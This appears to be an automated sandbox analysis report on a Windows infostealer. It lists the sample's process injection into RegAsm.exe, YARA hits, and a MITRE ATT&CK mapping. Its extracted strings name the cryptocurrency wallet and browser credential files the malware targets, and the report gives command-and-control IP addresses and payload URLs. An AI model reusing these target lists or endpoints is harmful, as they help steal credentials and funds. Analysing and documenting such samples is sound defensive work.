                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,2_2_0041C0E9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_00410C53
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00410D2E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: RegAsm.exe, 00000002.00000002.3293998119.00000000012EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                        Stealing of Sensitive Information

                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3fe5570.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3fe5570.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6128, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6508, type: MEMORYSTR
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: *,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Exodus Web3 Wallet
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|DESKTOP|%DESKTOP%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                        Source: RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                        Source: Yara match File source: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6508, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match File source: sslproxydump.pcap, type: PCAP
                        Source: Yara match File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.file.exe.3fe5570.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 0.2.file.exe.3fe5570.2.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: file.exe PID: 6128, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6508, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C280C40 sqlite3_bind_zeroblob, 2_2_6C280C40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C280D60 sqlite3_bind_parameter_name, 2_2_6C280D60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6C1A8EA0 sqlite3_clear_bindings, 2_2_6C1A8EA0
                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 511 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 4 Obfuscated Files or Information | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Software Packing | NTDS | 54 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 12 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 511 Process Injection | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (ID: 1519637, Sample: file.exe, Startdate: 26/09/2024, Architecture: WINDOWS, Score: 100)

• Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 9 other signatures
• Top-level DNS/IP: steamcommunity.com; dbsmena.com
• Process: file.exe (started)
  Signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
  Started processes: RegAsm.exe, conhost.exe
• Process: RegAsm.exe (started by file.exe)
  DNS/IP: 5.75.211.162, 443, 49716, 49717 (HETZNER-ASDE, Germany); steamcommunity.com 104.102.49.254, 443, 49715 (AKAMAI-ASUS, United States); dbsmena.com 172.105.54.160, 443, 49739 (LINODE-APLinodeLLCUS, United States)
  Dropped files: C:\Users\user\AppData\...\ljhgfsd[1].exe, PE32; C:\ProgramData\vcruntime140.dll, PE32; C:\ProgramData\softokn3.dll, PE32; 5 other files (none is malicious)
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 5 other signatures
• Process: conhost.exe (started by file.exe)

                        No Antivirus matches
Source                            Detection  Scanner        Label  Link
C:\ProgramData\freebl3.dll        0%         ReversingLabs
C:\ProgramData\mozglue.dll        0%         ReversingLabs
C:\ProgramData\msvcp140.dll       0%         ReversingLabs
C:\ProgramData\nss3.dll           0%         ReversingLabs
C:\ProgramData\softokn3.dll       0%         ReversingLabs
C:\ProgramData\vcruntime140.dll   0%         ReversingLabs
                        No Antivirus matches
                        No Antivirus matches
Name                IP              Active  Malicious  Antivirus Detection  Reputation
steamcommunity.com  104.102.49.254  true    true                            unknown
dbsmena.com         172.105.54.160  true    false                           unknown
Name                                                   Malicious  Antivirus Detection       Reputation
https://5.75.211.162/mozglue.dll                       true       Avira URL Cloud: malware  unknown
https://5.75.211.162/freebl3.dll                       true       Avira URL Cloud: malware  unknown
https://5.75.211.162/vcruntime140.dll                  true       Avira URL Cloud: malware  unknown
https://steamcommunity.com/profiles/76561199780418869  true       Avira URL Cloud: malware  unknown
https://dbsmena.com/ljhgfsd.exe                        false      Avira URL Cloud: safe     unknown
https://5.75.211.162/softokn3.dll                      true       Avira URL Cloud: malware  unknown
https://5.75.211.162/sqlp.dll                          true       Avira URL Cloud: malware  unknown
https://5.75.211.162/msvcp140.dll                      true       Avira URL Cloud: malware  unknown
                            • URL Reputation: safe
                            unknown
                            https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            unknown
                            https://5.75.211.162rt/form-data;RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.entrust.net03file.exefalse
                            • URL Reputation: safe
                            unknown
                            http://ocsp.entrust.net02file.exefalse
                            • URL Reputation: safe
                            unknown
                            https://help.steampowered.com/en/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            unknown
                            https://steamcommunity.com/market/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://store.steampowered.com/news/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiCFHDBF.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://dbsmena.com/ljhgfsd.exe?RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://5.75.211.162/softokn3.dll6V#~RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
